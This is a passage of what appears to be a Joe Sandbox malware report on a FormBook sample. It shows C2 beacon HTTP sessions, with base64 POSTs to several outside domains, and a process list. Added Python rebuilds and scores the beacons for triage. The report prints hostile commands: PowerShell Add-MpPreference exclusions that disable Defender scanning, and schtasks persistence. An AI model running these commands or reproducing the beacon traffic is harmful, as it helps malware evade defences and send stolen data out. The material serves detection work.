                                                            Data Ascii: MHJ0GXi=ZOC90mTtFQvaokxMjewNkCd2Wek7u2W8b3tYCU6qQQySRuIi1olENUNt78k/70glFlrTP31CvO5JSdJxfhloMuxK5lNsqZtaTPrjTV/uAVgcduoC2TiJ1x/COAeDPPYqdmWjNeJuVfyHKwxe3P2Mu1BzhsU6/QQnDpzPx10E9Lox4H9DMaqp0q1p7830HHe+RKpEd3ZikGh0gRWDbA==
                                                            Jan 11, 2025 04:17:40.763919115 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                            content-length: 0
                                                            connection: close

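Every request in sessions 10 to 14 above has the same shape: a POST (or, in session 12, a GET with the same parameter in the query string) to a short directory path such as /yf1h/ or /rxts/, one form parameter named MHJ0GXi whose value is a base64 blob, an Android "Mobile Safari" User-Agent sent from a Windows executable under C:\Program Files (x86)\, Connection: close, and a Referer that is just Origin plus the path. The servers answer 404, 405 or a 301 to the apex host, so the report shows only the client half of the protocol; the request shape is what identifies the beacon. The following Python is an added example, not part of the Joe Sandbox report and not the sample's own code. It rebuilds the session 10 POST from its headers and the hex "Data Raw" body shown above (Accept* headers omitted), copies the session 12 GET, constructs a benign WordPress request for contrast, and scores each against those traits. The indicator names, the three-hit threshold and the BENIGN_GET fixture are this example's own assumptions.

```python
"""Beacon triage for the HTTP sessions above (added example, not Joe Sandbox code).
S10_* re-create the session 10 POST (Accept* headers omitted) with the body taken from
the report's hex 'Data Raw' line; S12_GET copies the session 12 GET; BENIGN_GET is a
constructed contrast case. Indicator names and the 3-hit threshold are this example's
own choices, not a published FormBook signature."""
import base64
import binascii
import re

PROCESS = (r"C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx"
           r"\ISaSZznjXcpoJ.exe")
UA = ("Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) "
      "AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30")
S10_POST_HEAD = (
    "POST /yf1h/ HTTP/1.1\r\nHost: www.hayaniya.org\r\nConnection: close\r\n"
    "Content-Length: 240\r\nCache-Control: max-age=0\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\nOrigin: http://www.hayaniya.org\r\n"
    "Referer: http://www.hayaniya.org/yf1h/\r\nUser-Agent: " + UA + "\r\n\r\n")
S10_BODY_HEX = (  # the 240 body bytes exactly as the report's 'Data Raw' view prints them
    "4d 48 4a 30 47 58 69 3d 56 58 42 6f 37 4d 76 38 36 77 2f 78 71 41 51 6f 45 4a 43 57 42 79 "
    "61 75 39 62 34 76 74 67 5a 53 73 63 79 48 48 39 77 53 76 52 53 55 66 54 51 33 4d 59 4d 49 "
    "4e 56 49 6d 47 44 56 69 44 74 2b 41 4d 75 47 64 6d 54 2f 64 77 65 6d 6b 67 48 61 37 54 70 "
    "6e 5a 73 64 71 4f 4c 7a 47 45 54 7a 76 59 46 6f 44 6c 43 70 79 38 7a 2f 50 6b 6b 47 71 38 "
    "5a 75 38 77 30 46 76 6a 6b 72 46 33 56 6f 36 51 4a 56 74 2f 30 78 69 74 6a 53 4b 7a 6d 73 "
    "6b 4e 32 75 34 33 45 68 46 4f 59 79 75 75 6c 5a 7a 56 6d 6f 6e 32 75 49 4f 44 58 47 53 39 "
    "64 30 51 6d 71 44 79 6b 62 6a 4e 75 6b 74 66 64 6c 76 79 65 73 49 37 46 44 4f 42 68 57 79 "
    "31 73 68 59 74 52 4a 39 31 39 32 57 34 6f 75 4d 35 70 74 4a 59 58 46 54 39 72 50 73 41 3d")
S12_GET = (
    "GET /yf1h/?MHJ0GXi=YVpI46H16R/w/kk1bY6rBRavyZUbsgJtp9CZM+Bxvkr6dioDBNQhLHAnFkN0G7WaNs"
    "S3kDmK0ayEpl6TGabHlNeLLSejHELaV5PyBe2QzNbQvUHYc/0M0Tzmov1eC9unFVYK6Dr3q02N&nHI4y=ULkH023p-2"
    " HTTP/1.1\r\nHost: www.hayaniya.org\r\nConnection: close\r\nUser-Agent: " + UA + "\r\n\r\n")
BENIGN_GET = ("GET /wp-json/ HTTP/1.1\r\nHost: www.hayaniya.org\r\nConnection: keep-alive\r\n"
              "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0\r\n\r\n")

B64 = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
SHORT_DIR = re.compile(r"^/[A-Za-z0-9]{2,8}/$")      # /yf1h/, /rxts/
ANDROID_UA = re.compile(r"Android .*Mobile Safari")

def hex_dump_to_bytes(dump):
    """Turn the report's space-separated 'Data Raw' hex view back into bytes."""
    return bytes.fromhex(dump)

def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, path, query, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _ = lines[0].split(" ", 2)
    path, _, query = target.partition("?")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "query": query, "headers": headers, "body": body}

def split_form(data):
    """Split k=v&k=v with NO plus/percent decoding: urllib.parse.parse_qs would turn
    the '+' inside these base64 blobs into spaces and corrupt them."""
    return [tuple(item.partition("=")[::2]) for item in data.split("&") if item]

def decode_b64_blob(value):
    """Strict base64 decode; None when the value is not a well-formed blob."""
    if len(value) % 4 or not B64.match(value):
        return None
    try:
        return base64.b64decode(value, validate=True)
    except binascii.Error:
        return None

def beacon_indicators(req, process_path):
    """Traits shared by the beacons above that a normal browser request would not show."""
    h, hits = req["headers"], []
    params = split_form(req["body"] if req["method"] == "POST" else req["query"])
    if SHORT_DIR.match(req["path"]):
        hits.append("short opaque directory path")
    if params and len(params[0][1]) >= 64 and decode_b64_blob(params[0][1]) is not None:
        hits.append("first parameter value is a base64 blob")
    if ANDROID_UA.search(h.get("user-agent", "")) and process_path.lower().endswith(".exe"):
        hits.append("Android mobile User-Agent sent by a Windows executable")
    if h.get("origin") and h.get("referer") == h["origin"] + req["path"]:
        hits.append("Referer is exactly Origin plus the request path")
    if h.get("connection", "").lower() == "close" and h.get("cache-control") == "max-age=0":
        hits.append("Connection: close together with Cache-Control: max-age=0")
    return hits

def triage(raw_request, process_path):
    """Parse one request and report parameter keys, blob sizes and indicator hits."""
    req = parse_request(raw_request)
    params = split_form(req["body"] if req["method"] == "POST" else req["query"])
    blobs = [decode_b64_blob(v) for _, v in params]
    hits = beacon_indicators(req, process_path)
    return {"path": req["path"], "keys": [k for k, _ in params],
            "content_length_ok": int(req["headers"].get("content-length", 0)) == len(req["body"]),
            "blob_lengths": [len(b) for b in blobs if b is not None],
            "indicators": hits, "formbook_like": len(hits) >= 3}

def session10_request():
    """Session 10 POST rebuilt from its headers plus the hex-decoded body."""
    return S10_POST_HEAD + hex_dump_to_bytes(S10_BODY_HEX).decode("ascii")

if __name__ == "__main__":
    for name, raw in (("session 10", session10_request()), ("session 12", S12_GET),
                      ("benign", BENIGN_GET)):
        print(name, triage(raw, PROCESS))
```

Two details matter when reusing this on the sessions above. The body of the session 10 POST decodes to exactly the 240 bytes its Content-Length announces, and the MHJ0GXi value decodes to 173 bytes of non-text data (105 bytes for the session 12 query value); the report does not show how that payload is encoded, so the example only measures it. The splitting is done by hand on purpose: urllib.parse.parse_qs would rewrite the '+' characters inside the base64 values as spaces and break the decode, which is the kind of silent corruption that makes a detector miss the beacon.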

                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            14 | 192.168.2.7 | 49991 | 13.248.169.48 | 80 | 6896 | C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 11, 2025 04:17:42.866703033 CET | 822 | OUT | POST /rxts/ HTTP/1.1
                                                            Host: www.lovel.shop
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-us
                                                            Accept-Encoding: gzip, deflate
                                                            Connection: close
                                                            Content-Length: 240
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Origin: http://www.lovel.shop
                                                            Referer: http://www.lovel.shop/rxts/
                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                            Data Ascii: MHJ0GXi=ZOC90mTtFQva50BMi9INsCd5Z+k7hWW4b3hYCVuAQjWSSO4i0plEB0Ntzck+2UgiFkXtPyVCvPdJSY1xfQlrN+xIxFNuk5taTPrjTVrQAVYccfYC5WeGuR/FeQeDLPYudmWBNfFUVa2HKype2e2Nn1BPvMUq5D1ZMLPo/1s86ogBwR8hW4mFq7NS/+TCQhDLTLtcQVtD7xEetD3HNxG1KT7oOavydjsYYNxQQ1o=
                                                            Jan 11, 2025 04:17:43.321705103 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                            content-length: 0
                                                            connection: close


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            15 | 192.168.2.7 | 49992 | 13.248.169.48 | 80 | 6896 | C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 11, 2025 04:17:45.421041965 CET | 1835 | OUT | POST /rxts/ HTTP/1.1
                                                            Host: www.lovel.shop
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-us
                                                            Accept-Encoding: gzip, deflate
                                                            Connection: close
                                                            Content-Length: 1252
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Origin: http://www.lovel.shop
                                                            Referer: http://www.lovel.shop/rxts/
                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                            Data Raw: 4d 48 4a 30 47 58 69 3d 5a 4f 43 39 30 6d 54 74 46 51 76 61 35 30 42 4d 69 39 49 4e 73 43 64 35 5a 2b 6b 37 68 57 57 34 62 33 68 59 43 56 75 41 51 6a 65 53 52 2f 59 69 31 4b 4e 45 50 55 4e 74 35 38 6b 46 32 55 67 7a 46 6c 2f 68 50 79 4a 53 76 4d 31 4a 54 39 35 78 4f 53 4e 72 48 2b 78 49 39 6c 4e 7a 71 5a 73 59 54 50 37 5a 54 56 37 51 41 56 59 63 63 63 41 43 77 6a 69 47 70 68 2f 43 4f 41 66 58 50 50 59 47 64 6d 65 72 4e 66 52 2b 53 75 43 48 4b 53 35 65 30 73 65 4e 6f 31 42 4a 69 73 56 31 35 44 4a 38 4d 4c 6a 6b 2f 32 77 53 36 72 41 42 67 67 68 39 48 6f 75 2f 34 37 42 33 2f 4e 2f 59 58 6a 44 59 65 49 4e 39 50 6d 52 30 33 42 70 6b 6f 44 62 50 5a 30 7a 46 63 67 33 70 49 72 44 46 5a 30 55 56 4b 6f 39 4f 45 55 37 4d 4e 56 78 63 78 43 73 53 50 6a 42 4c 48 6d 38 7a 5a 35 4c 4b 58 48 4a 79 4b 56 75 63 31 41 30 6e 44 32 47 66 47 51 4d 6c 63 63 48 39 6d 36 54 74 6f 72 65 6d 4d 49 73 4f 62 4a 43 69 4f 74 58 31 33 39 6f 33 6f 43 52 65 51 72 31 57 47 4a 6a 2f 65 52 76 41 46 77 4b 70 51 5a 37 41 2b 77 43 41 4c 33 [TRUNCATED]
                                                            Data Ascii: MHJ0GXi= [TRUNCATED]
                                                            Jan 11, 2025 04:17:45.866480112 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                            content-length: 0
                                                            connection: close


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            16 | 192.168.2.7 | 49993 | 13.248.169.48 | 80 | 6896 | C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 11, 2025 04:17:47.971817970 CET | 550 | OUT | GET /rxts/?nHI4y=ULkH023p-2&MHJ0GXi=UMqd3Rr/GgjcpDtMifF0hAVXULwugGyaJHdfF0vXYxuoY8NmwcRKHFRQ3Zc522gmFWLmVhpOr5FlbfkrODlmI/FI9mNBtfUcHsH1BXvHeC8ccNMTzjG08xLSDUiWAIgxE0vpFMVGa825 HTTP/1.1
                                                            Host: www.lovel.shop
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-us
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                            Jan 11, 2025 04:17:53.430593967 CET | 401 | IN | HTTP/1.1 200 OK
                                                            content-type: text/html
                                                            date: Sat, 11 Jan 2025 03:17:53 GMT
                                                            content-length: 280
                                                            connection: close
                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?nHI4y=ULkH023p-2&MHJ0GXi=UMqd3Rr/GgjcpDtMifF0hAVXULwugGyaJHdfF0vXYxuoY8NmwcRKHFRQ3Zc522gmFWLmVhpOr5FlbfkrODlmI/FI9mNBtfUcHsH1BXvHeC8ccNMTzjG08xLSDUiWAIgxE0vpFMVGa825"}</script></head></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            17 | 192.168.2.7 | 49994 | 15.197.148.33 | 80 | 6896 | C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 11, 2025 04:17:58.476680040 CET | 814 | OUT | POST /zs4o/ HTTP/1.1
                                                            Host: www.duskgazes.work
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-us
                                                            Accept-Encoding: gzip, deflate
                                                            Connection: close
                                                            Content-Length: 220
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Origin: http://www.duskgazes.work
                                                            Referer: http://www.duskgazes.work/zs4o/
                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                            Data Ascii: MHJ0GXi=12aPUta8fjPdDFEmXlrT/hQ3Cu5RIxqWJE3DJUI+Nxp0ld6MXfmQ8w8q13V9RrZJH1pv9PcKcJujpPduwc5J3TdWI8N21vnEbTqg7pUlC3hNrKXO0ZAc2olGhmnjKSextwkJQR3wSkJXep3YQq7Ujqb0pgUnrkWCBhtqBdZ6LA8mOlJps9YI6ei3RFnD2OI1V3znbCNu905CfWPUjw==
                                                            Jan 11, 2025 04:17:58.927802086 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                            content-length: 0
                                                            connection: close


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            18 | 192.168.2.7 | 49995 | 15.197.148.33 | 80 | 6896 | C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 11, 2025 04:18:01.027430058 CET | 834 | OUT | POST /zs4o/ HTTP/1.1
                                                            Host: www.duskgazes.work
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-us
                                                            Accept-Encoding: gzip, deflate
                                                            Connection: close
                                                            Content-Length: 240
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Origin: http://www.duskgazes.work
                                                            Referer: http://www.duskgazes.work/zs4o/
                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                            Data Ascii: MHJ0GXi=12aPUta8fjPdFUUmai/T6BQ4ce5RCRqSJErDJV95MDd0k/yMWemQ/w8q+XV8cLZCH1tJ9N4KcJ6jpOtuxvRK0jdQBcNwo/nEbTqg7pBtCxJNr6nOmtcbo4lF2Wnjcie1twkRQTDaSnxXepnYR77T2abu2wVo7XLrYANtCvRhFzs8PTIL2fUkkPaMVHD1hoVAX23/Wg5PiDcoSEuQ1Jn1TMJhNgCJDAM6SK3Zuf4=
                                                            Jan 11, 2025 04:18:01.489027977 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                            content-length: 0
                                                            connection: close


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            19 | 192.168.2.7 | 49996 | 15.197.148.33 | 80 | 6896 | C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 11, 2025 04:18:03.576286077 CET | 1847 | OUT | POST /zs4o/ HTTP/1.1
                                                            Host: www.duskgazes.work
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-us
                                                            Accept-Encoding: gzip, deflate
                                                            Connection: close
                                                            Content-Length: 1252
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Origin: http://www.duskgazes.work
                                                            Referer: http://www.duskgazes.work/zs4o/
                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                            Data Ascii: MHJ0GXi=12aPUta8fjPdFUUmai/T6BQ4ce5RCRqSJErDJV95MDl0lMqMX9+Q+w8qinV5cLZlH1VF9NEgcKCjosluguRKjTdQDcNx1vmGbT6k7pRtCxJNr4POl5Abq4lGhmnvKSfQtwsBQTHgSXRXeIXYSJTT06bw1wU37XHwYBhXCuVHFx88OitPi7Au6+ulZxLgrp5TWXXERA1trzIRKUKrxu/wSapeKyWwI11VOKvi046D89Y4vVEVRd5MUb6B0fXy7lZkfhbnVB/ahjmUxg/TcZLUCnku3Z7DZRXE+ksr62A/hKWx3Rs0A2TZMupl6lIqzEDzZQKHzqX2rM0LGLKn12nrHWfAjmII0ij5Acinzww3RbJ9YTIcYxEobSFoKUoDnc/jqt7cJqYX9CL5+k0QGj0Di4Eczs/BrFkVURu8NbHKhi4eSfM7sb1cd+UhGoWsAt4Z8JrcaUif6BWYXGM8ECPQvCwC2XZUE8/cncB8dYt1p9+6GL5FK7p/082+wF70sBsWmjbMnA4+5PABHB2WUzKcqleeJlbE3pb5T7Yrw000gR0E+9SNzTKumtBsLADdwcHkI6mslZNn+MwwIP9/2vhBLIzOnxlYk+Q0AnDnpKdeLoePjF8FCUiYaXiG1uXgWhkVr7Z482dzt+8oi3Iod6vxU2BzEr6xo/uxexA7WEfgJ50b29CLofZUv0ZSs6kui1uCkmb+cGjF9SsdTQE+fZxnOUjP/pzVEGnhCl78/jsl0BTlL9ExA30b8zp6hyXZXJ2Tw358nZhuahurBQ4YXj5h/WTV50t+18TTASDFXCvs89OcYDf5huFNz2WZoFeCGPAzvNWns7XOqBOuHzPIvI61TOglwXRUsxGRJY9U/lzd3TxgaabWqBhLBwMdxw87NCH9yhKYIGtJThyALvng5QNO+VnPc4JG5jhb2qV6a57BqOSEwe9Mli5QMPsGXeQJZlBZSPZUYUNRcrDwq28uMpAY8DSyaL/oX7yQHrDsu16AEqzB [TRUNCATED]
                                                            Jan 11, 2025 04:18:04.955147982 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                            content-length: 0
                                                            connection: close


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                            20 | 192.168.2.7 | 49997 | 15.197.148.33 | 80
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 11, 2025 04:18:06.862514019 CET | 554 | OUT | GET /zs4o/?MHJ0GXi=40yvXZqQXwyOFTl0d1fxwhQGTsZjKCC3JWjHJEZ8IBZutO+YSqvvwioh1RBVRKlMIRVxucUqEMWgr+FAgfZYrRUrNMNQgIXAOg6Dx5ZtNmZ3l7Xsr8IlhehM93LMclm51whCbAvUXWV5&nHI4y=ULkH023p-2 HTTP/1.1
                                                            Host: www.duskgazes.work
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-us
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                            Jan 11, 2025 04:18:07.308546066 CET | 401 | IN | HTTP/1.1 200 OK
                                                            content-type: text/html
                                                            date: Sat, 11 Jan 2025 03:18:07 GMT
                                                            content-length: 280
                                                            connection: close
                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?MHJ0GXi=40yvXZqQXwyOFTl0d1fxwhQGTsZjKCC3JWjHJEZ8IBZutO+YSqvvwioh1RBVRKlMIRVxucUqEMWgr+FAgfZYrRUrNMNQgIXAOg6Dx5ZtNmZ3l7Xsr8IlhehM93LMclm51whCbAvUXWV5&nHI4y=ULkH023p-2"}</script></head></html>



                                                            Target ID:0
                                                            Start time:22:15:59
                                                            Start date:10/01/2025
                                                            Path:C:\Users\user\Desktop\n2pGr8w21V.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\n2pGr8w21V.exe"
                                                            Imagebase:0xa70000
                                                            File size:974'344 bytes
                                                            MD5 hash:8D46BAF183C4F911EA9BF65C8797D8EA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:9
                                                            Start time:22:16:05
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\n2pGr8w21V.exe"
                                                            Imagebase:0x830000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:10
                                                            Start time:22:16:05
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff75da10000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:11
                                                            Start time:22:16:05
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uEugNEto.exe"
                                                            Imagebase:0x830000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:12
                                                            Start time:22:16:05
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff75da10000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:13
                                                            Start time:22:16:05
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uEugNEto" /XML "C:\Users\user\AppData\Local\Temp\tmpB98D.tmp"
                                                            Imagebase:0x2a0000
                                                            File size:187'904 bytes
                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:14
                                                            Start time:22:16:05
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff75da10000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:15
                                                            Start time:22:16:06
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                            Imagebase:0xa50000
                                                            File size:45'984 bytes
                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.1575119582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.1576124904.0000000001470000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.1578348944.00000000022B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:16
                                                            Start time:22:16:09
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                            Imagebase:0x7ff7fb730000
                                                            File size:496'640 bytes
                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                            Has elevated privileges:true
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:17
                                                            Start time:22:16:09
                                                            Start date:10/01/2025
                                                            Path:C:\Users\user\AppData\Roaming\uEugNEto.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Roaming\uEugNEto.exe
                                                            Imagebase:0xc80000
                                                            File size:974'344 bytes
                                                            MD5 hash:8D46BAF183C4F911EA9BF65C8797D8EA
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 68%, ReversingLabs
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:19
                                                            Start time:22:16:18
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uEugNEto" /XML "C:\Users\user\AppData\Local\Temp\tmpEA52.tmp"
                                                            Imagebase:0x2a0000
                                                            File size:187'904 bytes
                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:20
                                                            Start time:22:16:18
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff75da10000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
